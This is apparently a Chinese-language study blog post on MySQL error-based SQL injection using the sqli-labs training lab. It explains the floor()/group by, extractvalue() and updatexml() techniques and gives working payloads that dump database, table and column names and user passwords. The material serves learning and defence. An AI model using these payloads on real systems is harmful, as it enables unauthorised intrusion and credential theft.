一、報錯注入詳解

近期學習 SQL 報錯注入，本篇文章為關于報錯注入的一些個人理解，如有錯誤，希望指出
本文使用 sqli-labs 資料庫作為示例

1、十種 MySQL 報錯注入：

報錯注入方式有很多，其中比較常見的有 floor() 、extractvalue() 、updatexml() 三種，本篇文章主要對這三種進行分析，其他的請參考文章：十種MySQL報錯注入

2、floor()

2.1、payload 分析

先貼上一個常見的 payload 再進行分析 (sqli-labs Less-5)

' union select 1,count(*),concat(floor(rand(0)*2),database())x from `users` group by x %23

首先這個 payload 和網上很多的不太一樣，查閱網上相關博客時發現大多數的 payload 都是這樣寫的

' union select 1,2,3 from (select count(*),concat(floor(rand(0)*2),database())x from `users` group by x)a %23

這個就是把發生報錯的 select 作為一個子查詢，外面有一個 select 1,2,3 from 子查詢 (1,2,3 是為了與union 前面的欄位數保持一致，上面的 payload 多加了一個 1，也是同理)

這里的 payload 可能是考慮到 MySQL Group By 中 Select 指定的欄位限制，在select指定的欄位要么就要包含在Group By 陳述句的后面，作為分組的依據；要么就要被包含在聚合函式中，比如說下面的這個例子

group by 后面欄位沒有 password，所以 select 后面就不能寫 password

但是寫常數就可以

接下來回到第一個 payload 的解釋，首先了解兩個函式

1. floor() ：向下取整

2. rand() ：

   • 沒有種子值，產生一個 [0,1) 的亂數
     

     產生結果每次都不同

   • 如果指定了seed，則回傳可重復的亂數序列，
     
     當 seed=0 時，每次都按照這個順序產生亂數

然后 floor(rand(0)*2) 的目的就應該清楚了，為了產生固定順序的 0 、1 數

產生這些 0 1數有什么用處呢？接下來就與 MySQL 的 group by 有關了

先把 payload 中關鍵的部分，也就是發生報錯的 select 陳述句粘到 sqlyog 中執行一下，發現報錯資訊是 “Duplicate entry ‘1security’ for key ‘<group_key>’ ”，就是主鍵重復，主鍵必須是非空且不能重復的，

group by key 的原理是回圈讀取資料的每一行，將結果保存于臨時表中，讀取每一行的 key 時，如果 key 存在于臨時表中，則不在臨時表中更新臨時表的資料；如果 key 不在臨時表中，則在臨時表中插入 key 所在行的資料，

這個臨時表的主鍵就是 group by 后面的欄位 x ，x 僅僅是 concat(floor(rand(0)*2),database()) 的別名，這樣我們就基本弄清報錯的原因了，其原因主要是因為臨時表的主鍵 x 重復，在這里 group by 要對 x 進行兩次運算，也就是要呼叫兩次 rand(0) ，第一次是拿 group by 后面的欄位值到臨時表中去對比前，首先獲取group by后面的值，這時用 concat(floor(rand(0)*2),database()) 計算出第一個 x 值；第二次是用 group by 后面的欄位的值在臨時表中查找，如果存在于表中，就不需要更改臨時表，如果不存在與臨時表中，那就需要把它插入到臨時表中，這里在插入時會進行第二次運算，由于 rand() 函式存在一定的隨機性，所以第二次運算的結果可能與第一次運算的結果不一致，但是這個運算的結果可能在臨時表中已經存在了，那么這時的插入必然導致主鍵的重復，進而引發錯誤，

為什么要有聚集函式 count(*) ？

如果沒有聚集函式 count(*) ，經過測驗并不報錯

至于原因，我也查找了很多關于 group by 的實作原理，感覺都不能很好的解釋，所以這里又是一個未解決的問題，（上面的 group by 原理來源于參考文章，是否正確有待驗證，）

用上面的 payload concat(floor(rand(0)*2),database()) 來舉例，floor(rand(0)*2) 產生的前五個數一定為01101，后面再拼接上 database()，這個是固定值，先不用管，接下來模擬下 group by 程序，遍歷 users 表第一行時，先計算出一個 x=0security，查臨時表，不存在，再次計算 x 然后插入 x=1security；遍歷到第二行，計算出一個 x=1security，臨時表中已經存在，繼續遍歷；遍歷到第三行，計算出一個 x=0security，發現表中沒有，再次計算 x 然后插入 x=1security，因為剛才已經插入過一個 1security，所以這時就發生主鍵重復，然后把 1security 作為報錯資訊輸出，攻擊者便可得到相關資訊，

2.2、Less-5 示例

payload：

#爆庫名：( database() 或 (select database()) )
' union select 1,count(*),concat(floor(rand(0)*2),database())x from information_schema.tables group by x%23

#爆表名：(網上有博客說不能使用 group_concat 拼接，但是在 sqli-labs Less-5 測驗可以使用，如果不能使用的話，可以使用 limit)
' union select 1,count(*),concat(floor(rand(0)*2),(select group_concat(table_name) from information_schema.tables where table_schema="security"))x from information_schema.tables group by x%23

#爆列名：（where 后面有兩個判斷條件：庫名和表名，避免不同庫中有相同表名，造成查詢出來的資料混亂）
' union select 1,count(*),concat(floor(rand(0)*2),(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"))x from information_schema.tables group by x%23

#爆資料：
' union select 1,count(*),concat(floor(rand(0)*2),(select concat(username,0x7e,password) from `users` limit 0,1))x from information_schema.tables group by x%23

最后爆資料的 payload 的確不能使用 group_concat ，把 SQL 陳述句拿到 sqlyog 執行，確實沒有報錯，正常回傳了兩類拼接后的資料，正常來說 rand(0) 的執行次數應該取決于最后一個 from 的表的行數（information_schema.tables）

至于為什么，研究了半天沒搞懂，有知道的同學可以幫忙解釋一下，非常感謝！

爆庫名：

爆表名：

爆列名：

爆資料：

3、extractvalue() 、updatexml()

從 mysql5.1.5 開始提供兩個 XML 查詢和修改的函式，extractvalue 和 updatexml，extractvalue 負責在 xml 檔案中按照 xpath 語法查詢節點內容，updatexml 則負責修改查詢到的內容:

mysql> select extractvalue(1,'/a/b');
+------------------------+
| extractvalue(1,'/a/b') |
+------------------------+
|                        |
+------------------------+
1 row in set (0.01 sec)

它們的第二個引數都要求是符合xpath語法的字串，如果不滿足要求，則會報錯，并且將查詢結果放在報錯資訊里：

mysql> select updatexml(1,concat(0x7e,(select @@version),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'
mysql> select extractvalue(1,concat(0x7e,(select @@version),0x7e));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'

payload：

1.extractvalue()
#爆庫名：
' and(select extractvalue(1,concat(0x7e,(select database()))))

#爆表名：
' and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

#爆列名：
' and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))

#爆資料：
' and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))


2.updatexml()
#爆庫名：
' and(select updatexml(1,concat(0x7e,(select database())),0x7e))

#爆表名：
' and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))

#爆列名：
' and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))

#爆資料：
' and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

• ~ 可以換成 # 、$ 等不滿足 xpath 格式的字符
• extractvalue() 能查詢字串的最大長度為 32，如果我們想要的結果超過 32，就要用 substring() 函式截取或 limit 分頁，一次查看最多 32 位

參考文章：

https://blog.csdn.net/silence1_/article/details/90812612

https://www.cnblogs.com/richardlee97/p/10617115.html

https://xz.aliyun.com/t/253 （這篇寫的很好）